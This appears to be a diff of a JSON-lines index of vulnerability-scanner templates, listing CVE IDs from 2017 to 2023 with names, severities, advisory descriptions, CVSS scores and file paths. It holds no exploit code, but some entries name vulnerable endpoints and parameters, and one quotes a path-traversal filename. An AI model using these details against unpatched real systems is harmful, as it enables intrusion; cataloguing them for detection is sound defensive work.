{"ID":"CVE-2017-5689","Info":{"Name":"Intel Active Management - Authentication Bypass","Severity":"critical","Description":"Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-5689.yaml"}
{"ID":"CVE-2017-5868","Info":{"Name":"OpenVPN Access Server 2.1.4 - CRLF Injection","Severity":"medium","Description":"CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via \"%0A\" characters in the PATH_INFO to __session_start__/.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-5868.yaml"}
{"ID":"CVE-2017-5871","Info":{"Name":"Odoo \u003c= 8.0-20160726 \u0026 9.0 - Open Redirect","Severity":"medium","Description":"An Open Redirect vulnerability in Odoo versions \u003c= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2017/CVE-2017-5871.yaml"}
{"ID":"CVE-2017-5982","Info":{"Name":"Kodi 17.1 - Local File Inclusion","Severity":"high","Description":"Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-5982.yaml"}
{"ID":"CVE-2017-6090","Info":{"Name":"PhpColl 2.5.1 Arbitrary File Upload","Severity":"high","Description":"PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-6090.yaml"}
@ -628,6 +631,9 @@
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7192","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"message\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7192.yaml"}
{"ID":"CVE-2018-7193","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7193.yaml"}
{"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"}
@ -656,6 +662,7 @@
{"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-0221.yaml"}
{"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"}
{"ID":"CVE-2019-0232","Info":{"Name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","Severity":"high","Description":"When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2019/CVE-2019-0232.yaml"}
{"ID":"CVE-2019-1003000","Info":{"Name":"Jenkins Script Security Plugin \u003c=1.49 - Sandbox Bypass","Severity":"high","Description":"A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-1003000.yaml"}
{"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"}
{"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"}
{"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"}
@ -806,6 +813,7 @@
{"ID":"CVE-2019-8451","Info":{"Name":"Jira \u003c8.4.0 - Server-Side Request Forgery","Severity":"medium","Description":"Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-8451.yaml"}
{"ID":"CVE-2019-8903","Info":{"Name":"Totaljs \u003c3.2.3 - Local File Inclusion","Severity":"high","Description":"Total.js Platform before 3.2.3 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-8903.yaml"}
{"ID":"CVE-2019-8937","Info":{"Name":"HotelDruid 2.3.0 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-8937.yaml"}
{"ID":"CVE-2019-8943","Info":{"Name":"WordPress Core 5.0.0 - Crop-image Shell Upload","Severity":"medium","Description":"WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-8943.yaml"}
{"ID":"CVE-2019-8982","Info":{"Name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent\u0026inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2019/CVE-2019-8982.yaml"}
{"ID":"CVE-2019-9041","Info":{"Name":"ZZZCMS 1.6.1 - Remote Code Execution","Severity":"high","Description":"ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-9041.yaml"}
{"ID":"CVE-2019-9618","Info":{"Name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","Severity":"critical","Description":"WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9618.yaml"}
@ -1386,6 +1394,7 @@
{"ID":"CVE-2021-37833","Info":{"Name":"Hotel Druid 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37833.yaml"}
{"ID":"CVE-2021-38146","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","Severity":"high","Description":"The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38146.yaml"}
{"ID":"CVE-2021-38147","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","Severity":"high","Description":"Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38147.yaml"}
{"ID":"CVE-2021-38156","Info":{"Name":"Nagios XI \u003c 5.8.6 - Cross-Site Scripting","Severity":"medium","Description":"In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-38156.yaml"}
{"ID":"CVE-2021-38314","Info":{"Name":"WordPress Redux Framework \u003c=4.2.11 - Information Disclosure","Severity":"medium","Description":"WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-38314.yaml"}
{"ID":"CVE-2021-38540","Info":{"Name":"Apache Airflow - Unauthenticated Variable Import","Severity":"critical","Description":"Apache Airflow Airflow \u003e=2.0.0 and \u003c2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38540.yaml"}
{"ID":"CVE-2021-38647","Info":{"Name":"Microsoft Open Management Infrastructure - Remote Code Execution","Severity":"critical","Description":"Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38647.yaml"}
@ -1501,6 +1510,7 @@
{"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"}
{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"}
{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"}
{"ID":"CVE-2021-45811","Info":{"Name":"osTicket 1.15.x - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-45811.yaml"}
{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"}
{"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45968.yaml"}
{"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-46005.yaml"}
@ -2020,6 +2030,9 @@
{"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"}
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"}
{"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"}
{"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"}
{"ID":"CVE-2023-1318","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1318.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
@ -2110,6 +2123,7 @@
{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"}
{"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"}
{"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"}
{"ID":"CVE-2023-2745","Info":{"Name":"WordPress Core \u003c=6.2 - Directory Traversal","Severity":"medium","Description":"WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the wp_lang parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2745.yaml"}
{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27584","Info":{"Name":"Dragonfly2 \u003c 2.1.0-beta.1 - Hardcoded JWT Secret","Severity":"critical","Description":"Dragonfly is an open source P2P-based file distribution and image acceleration system. It is hosted by the Cloud Native Computing Foundation (CNCF) as an Incubating Level Project. Dragonfly uses JWT to verify user. However, the secret key for JWT, \"Secret Key\", is hard coded, which leads to authentication bypass. An attacker can perform any action as a user with admin privileges. This issue has been addressed in release version 2.0.9. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27584.yaml"}
@ -2245,6 +2259,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38040","Info":{"Name":"Revive Adserver 5.4.1 - Cross-Site Scripting","Severity":"medium","Description":"A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38040.yaml"}
{"ID":"CVE-2023-38192","Info":{"Name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 allowing XSS via crafted incorrect passwords.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38192.yaml"}
{"ID":"CVE-2023-38194","Info":{"Name":"SuperWebMailer - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38194.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
@ -2274,6 +2289,7 @@
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
{"ID":"CVE-2023-39560","Info":{"Name":"ECTouch v2 - SQL Injection","Severity":"critical","Description":"ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \\default\\helpers\\insert.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39560.yaml"}
{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"}
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
{"ID":"CVE-2023-39650","Info":{"Name":"PrestaShop Theme Volty CMS Blog - SQL Injection","Severity":"critical","Description":"In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39650.yaml"}
@ -2284,7 +2300,15 @@
